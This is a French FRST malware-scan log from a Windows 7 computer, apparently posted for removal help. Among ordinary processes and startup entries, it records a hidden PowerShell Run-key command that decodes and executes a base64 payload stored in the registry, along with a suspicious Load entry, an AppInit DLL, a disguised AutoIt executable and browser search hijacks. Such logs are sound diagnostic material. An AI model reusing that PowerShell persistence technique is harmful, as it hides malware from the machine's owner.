Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x86) Version: 24-07-2016
Exécuté par Arnaud (administrateur) sur ARNAUD-PC (25-07-2016 11:19:05)
Exécuté depuis C:\Users\Arnaud\Downloads\Programs
Profils chargés: Arnaud (Profils disponibles: Arnaud)
Platform: Microsoft Windows 7 Professionnel Service Pack 1 (X86) Langue: Français (France)
Internet Explorer Version 8 (Navigateur par défaut: Chrome)
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processus (Avec liste blanche) =================

(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe
(Autodesk, Inc.) C:\Program Files\Autodesk\Content Service\Connect.Service.ContentService.exe
(Smadsoft) C:\Program Files\SMADAV\SMΔRTP.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Power Software Ltd) C:\Program Files\PowerISO\PWRISOVM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(BlueStack Systems, Inc.) C:\Program Files\BlueStacks\HD-Agent.exe
(DT Soft Ltd) C:\Program Files\DAEMON Tools Lite\daemon.exe
(BitTorrent Inc.) C:\Users\Arnaud\AppData\Roaming\uTorrent\uTorrent.exe
(Autodesk, Inc.) C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Update\GoogleUpdate.exe
(AutoIt Team) C:\Users\Arnaud\AppData\Roaming\Mozila\autoit.exe
(DVGSoft) C:\Program Files\SuperCopier3\SuperCopier3.exe
(BlueStack Systems, Inc.) C:\Program Files\BlueStacks\HD-LogRotatorService.exe
(Tonec Inc.) C:\Program Files\Internet Download Manager\IDMan.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(BlueStack Systems, Inc.) C:\Program Files\BlueStacks\HD-UpdaterService.exe
(WIBU-SYSTEMS AG) C:\Program Files\CodeMeter\Runtime\bin\CodeMeterCC.exe
() C:\Program Files\Bible Verse\verse.exe
(BitTorrent Inc.) C:\Users\Arnaud\AppData\Roaming\uTorrent\updates\3.4.7_42330\utorrentie.exe
(BitTorrent Inc.) C:\Users\Arnaud\AppData\Roaming\uTorrent\updates\3.4.7_42330\utorrentie.exe
(Tonec Inc.) C:\Program Files\Internet Download Manager\IEMonitor.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(SafeNet Inc.) C:\Windows\System32\hasplms.exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
() C:\Program Files\LuckyBrowse\app\LuckyBrowseStarter.exe
(Acresso Software Inc.) C:\Program Files\MATLAB\R2010b\etc\win32\lmgrd.exe
(Acresso Software Inc.) C:\Program Files\MATLAB\R2010b\etc\win32\lmgrd.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Nero AG) C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
(Nitro PDF Software) C:\Program Files\Nitro\Pro 9\NitroPDFDriverService9.exe
() C:\Program Files\Nitro\Pro 9\Nitro_UpdateService.exe
(Nalpeiron Ltd.) C:\Windows\System32\NLSSRV32.EXE
() C:\Windows\System32\rcdsrv.exe
() C:\ProgramData\SNS EVDO-Huawei\OnlineUpdate\ouc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(WIBU-SYSTEMS AG) C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Yahoo! Inc.) C:\Program Files\Yahoo!\Messenger\Ymsgr_tray.exe
() C:\Program Files\Systran\4_0\Premium\SystranServer.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(The MathWorks. Inc.) C:\Program Files\MATLAB\R2010b\etc\win32\MLM.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Macromedia, Inc.) C:\Users\Arnaud\Desktop\AUTO ECOLE\cour auto ecole\éz.exe
(Google Inc.) C:\Users\Arnaud\AppData\Local\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe

==================== Registre (Avec liste blanche) ===========================

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [11738184 2013-01-22] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe [953416 2013-01-18] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2221352 2011-03-24] (Synaptics Incorporated)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2011-09-27] (Apple Inc.)
HKLM\...\Run: [PWRISOVM.EXE] => C:\Program Files\PowerISO\PWRISOVM.EXE [312376 2012-02-09] (Power Software Ltd)
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [RtsCM] => C:\Windows\RTSCM.EXE [87696 2012-09-19] (Realtek Semiconductor Corp.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2015-04-10] (Oracle Corporation)
HKLM\...\Run: [BlueStacks Agent] => C:\Program Files\BlueStacks\HD-Agent.exe [904824 2015-08-19] (BlueStack Systems, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500208 2010-03-06] (Adobe Systems Incorporated)
HKLM\...\Run: [SwitchBoard] => C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM\...\Run: [AdobeCS5ServiceManager] => C:\Program Files\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [406992 2010-02-22] (Adobe Systems Incorporated)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Messenger (Yahoo!)] => C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe [4351216 2009-05-13] (Yahoo! Inc.)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files\DAEMON Tools Lite\daemon.exe [691656 2009-04-23] (DT Soft Ltd)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [uTorrent] => C:\Users\Arnaud\AppData\Roaming\uTorrent\uTorrent.exe [2133504 2016-05-24] (BitTorrent Inc.)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [894344 2013-02-05] (Autodesk, Inc.)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Google Update] => C:\Users\Arnaud\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-31] (Google Inc.)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Samsung Appstore] => C:\Users\Arnaud\AppData\Roaming\Mozila\autoit.exe [934400 2015-06-23] (AutoIt Team)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [SuperCopier3] => C:\Program Files\SuperCopier3\SuperCopier3.exe [2689536 2012-12-19] (DVGSoft)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [GenieFloater] => C:\Program Files\Genie Soft\Genie Cleaner\GenieFloater.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [26418304 2016-06-29] (Skype Technologies S.A.)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [3929296 2016-01-31] (Tonec Inc.)
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [{DD28954F-D516-484C-8B5C-AA13367422CA}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\VxmwYkWLZYATNL').nEcynOfbpybgcp)));
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Run: [Windows Update] => C:\Google\Windowsupdate.lnk [515 2015-05-13] ()
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\CurrentVersion\Windows: [Load] C:\ProgramData\mszjxin.exe <===== ATTENTION
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Policies\Explorer: []
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {2894c809-c077-11e5-ba02-705ab6c168ee} - F:\AutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {2894c814-c077-11e5-ba02-705ab6c168ee} - F:\AutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {34614488-6008-11e4-a517-002314a1a664} - G:\.\Setup.exe AUTORUN=1
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {41e59705-4adb-11e4-848b-002314a1a664} - G:\.\Setup.exe AUTORUN=1
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {4981ba0c-bf42-11e5-9fd5-705ab6c168ee} - F:\AutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {4981ba10-bf42-11e5-9fd5-705ab6c168ee} - F:\AutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {5ac32118-b706-11e5-b4ef-002314a1a664} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {66bbf63a-9320-11e4-b1c4-002314a1a664} - G:\TL-Bootstrap.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {69e1ddbf-0510-11e6-a875-002314a1a664} - H:\LGAutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {80c74b55-24ab-11e5-b613-705ab6c168ee} - F:\AutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {80c74b63-24ab-11e5-b613-705ab6c168ee} - F:\AutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {aef619fc-9827-11e4-905c-002314a1a664} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {b8d17b9b-464d-11e4-9b8d-806e6f6e6963} - E:\DriverPackSolution.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {bc02810c-a804-11e5-9a2d-002314a1a664} - F:\LGAutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {bc028344-a804-11e5-9a2d-705ab6c168ee} - F:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {bed80a50-c80c-11e5-90a2-705ab6c168ee} - F:\AutoRun.exe
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {d26d3ecc-e8c7-11e4-986d-002314a1a664} - F:\.\Setup.exe AUTORUN=1
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\...\MountPoints2: {f2d8dd4d-cbf2-11e4-bd31-705ab6c168ee} - G:\AutoRun.exe
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [894344 2013-02-05] (Autodesk, Inc.)
AppInit_DLLs: C:\ProgramData\Saophase\Inflex.dll => C:\ProgramData\Saophase\Inflex.dll [384512 2015-10-07] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Pas de fichier
ShellIconOverlayIdentifiers: [ID de superposition d'icônes des signatures numériques AutoCAD] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2013-02-08] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files\Internet Download Manager\IDMShellExt.dll [2015-08-14] (Tonec Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodeMeter Control Center.lnk [2014-09-29]
ShortcutTarget: CodeMeter Control Center.lnk -> C:\Program Files\CodeMeter\Runtime\bin\CodeMeterCC.exe (WIBU-SYSTEMS AG)
Startup: C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bible Verse.lnk [2015-01-20]
ShortcutTarget: Bible Verse.lnk -> C:\Program Files\Bible Verse\verse.exe ()
Startup: C:\Users\Arnaud\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPC Backup.lnk [2016-06-28]
ShortcutTarget: MyPC Backup.lnk -> C:\Program Files\OLBPre\OLBPre.exe ()
GroupPolicy: Restriction - Chrome <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 0.0.0.0
Tcpip\..\Interfaces\{6FEDCE4C-15E8-4821-953B-FAA6044BA13B}: [DhcpNameServer] 41.190.226.70 208.67.222.222
Tcpip\..\Interfaces\{B052F2D1-AF30-4F27-896E-79BD1FC24B5E}: [NameServer] 195.24.192.33 8.8.8.8
Tcpip\..\Interfaces\{B4E1D44A-8EB5-4AC8-B7BE-D53A9B0040E9}: [NameServer] 195.24.192.33 8.8.8.8
Tcpip\..\Interfaces\{CB27B84E-6829-4617-BF9B-86612791827C}: [DhcpNameServer] 192.168.1.1 0.0.0.0

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.hao123.com/?tn=95611903_hao_pg
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = hxxp://go.microsoft.com/fwlink/?linkid=42826
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms}
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms}
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.hao123.com/?tn=95611903_hao_pg
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://go.microsoft.com/fwlink/?LinkID=226786&Mkt=fr-FR&Src=MSE&Tid=0003446E&OHP=http%3A%2F%2Fsearchsimple%2Da.akamaihd.net%2F%3FaffID%3Dep,http%3A%2F%2Fgo.microsoft.com%2Ffwlink%2F%3Flinkid%3D69157&OSP=http%3A%2F%2Fsearchsimple%2Da.akamaihd.net%2F%3FaffID%3Dep%26q%3D%7BsearchTerms%7D%26r%3D644
HKU\S-1-5-21-3295785457-3515427366-3354837301-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> DefaultScope {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> OldSearch URL = hxxp://www.bing.com/search?FORM=SKY2DF&PC=SKY2&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {AD22EBAF-0D18-4fc7-90CC-5EA0ABBE9EB8} URL = hxxp://www.daemon-search.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {D90D266C-4C72-407C-973E-AA5293E5A497} URL = hxxp://searchsimple-a.akamaihd.net/?affID=mt-ep&q={searchTerms}&r=400
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {F2ED7B58-F213-448B-A58D-17ABDF60CCEB} URL = hxxp://isearch.avg.com/search?cid={3275E8C8-96B2-4AAA-8EEA-2ECEB9456D0C}&mid=08fc948e79a847d2ae61d16a52454f97-c8e39524f40e90e1f04be933c5d12eff3f44c88f&lang=fr&ds=st011&pr=sa&d=2014-09-30 10:43:11&v=9.0.0.23&sap=dsp&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTwkzwGbNf1Vk6jjLaGEvVnukhFQSHL4j-kQvIqwdQM_FFIu6tU8JiP6_nU71J_8ZCLoXfTPgM1-iX8fu566DYjv9rHKucLhaV2fJT7sKYuXOn8Fh1B5ZZ0jy0dz905zCC-MczNFsktwQo4bYpm2fpumywNKksPDKwmlfCA,,&q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files\Internet Download Manager\IDMIECC.dll [2015-12-08] (Internet Download Manager, Tonec Inc.)
BHO: Aide pour le lien d'Adobe PDF Reader -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2008-06-11] (Adobe Systems Incorporated)
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2008-06-11] (Adobe Systems Incorporated)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: PDFXChange 4.0 -> {42DFA04F-0F16-418e-B80C-AB97A5AFAD39} -> C:\Program Files\Tracker Software\PDF-XChange 4\PXCIEAddin4.dll [2011-09-16] (Tracker Softaware)
BHO: Ó¦Óñ¦Ò»¼ü°²×°²å¼þ -> {50F4150A-48B2-417A-BE4C-C83F580FB904} -> C:\Program Files\Common Files\Tencent\QQPhoneManager\2.0.201.3192\npQQPhoneManagerExt.dll [2014-05-30] (腾讯公司)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2015-05-25] (Oracle Corporation)
BHO: Ask Search Assistant BHO -> {9CB65201-89C4-402c-BA80-02D8C59F9B1D} -> C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL [2014-09-30] (Ask.com)
BHO: Pas de nom -> {aab803bd-f01b-423a-a89a-60af476e9f12} -> Pas de fichier
BHO: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2013-11-20] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2015-05-25] (Oracle Corporation)
BHO: Ask Toolbar BHO -> {FE063DB1-4EC0-403e-8DD8-394C54984B2C} -> C:\Program Files\AskTBar\bar\1.bin\ASKTBAR.DLL [2014-09-30] (Ask.com)
Toolbar: HKLM - DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll [2009-04-23] ()
Toolbar: HKLM - PDFXChange 4.0 - {42DFA04F-0F16-418e-B80C-AB97A5AFAD39} - C:\Program Files\Tracker Software\PDF-XChange 4\PXCIEAddin4.dll [2011-09-16] (Tracker Softaware)
Toolbar: HKLM - Ask Toolbar - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\1.bin\ASKTBAR.DLL [2014-09-30] (Ask.com)
Toolbar: HKLM - Systran Professional Premium 4.0 - {CFB25594-4D5F-11D6-AB7B-00B0D094B576} - C:\Program Files\Systran\4_0\Premium\IEPlugIn.dll [2002-04-12] (SYSTRAN)
Toolbar: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files\DAEMON Tools Toolbar\DTToolbar.dll [2009-04-23] ()
Toolbar: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> Pas de nom - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} - Pas de fichier
Toolbar: HKU\S-1-5-21-3295785457-3515427366-3354837301-1000 -> Ask Toolbar - {FE063DB9-4EC0-403E-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\1.bin\ASKTBAR.DLL [2014-09-30] (Ask.com)
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} file:///G:/MES%20SET%20UP/DIDACTICIEL%20ROBOT%20BAT/bin/swflash.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-10-14] (Microsoft Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2013-11-20] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.mystartsearch.com/?type=sc&ts=1419258415&from=epom&uid=HitachiXHTS725050A9A360_100309PCJ400VLH3DD0JX

FireFox:
========
FF ProfilePath: C:\Users\Arnaud\AppData\Roaming\Mozilla\Firefox\Profiles\rsf4uj49.default-1446631804636
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-09] ()
FF Plugin: @docu-track.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2000-01-01] (Tracker Software Products Ltd.)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-04-02] (Foxit Corporation)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-04-02] (Foxit Corporation)
FF Plugin: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin: @graphisoft.com/GDL Web Plug-in -> C:\Program Files\GRAPHISOFT\GDLWebControl\npGDLMozilla.dll [2012-06-27] (Graphisoft SE)
FF Plugin: @java.com/DTPlugin,version=10.79.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-05-25] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.79.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2015-05-25] (Oracle Corporation)
FF Plugin: @messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6 -> C:\Program Files\Yahoo!\Shared\npYState.dll [2009-05-13] (Yahoo! Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled [Pas de fichier]
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
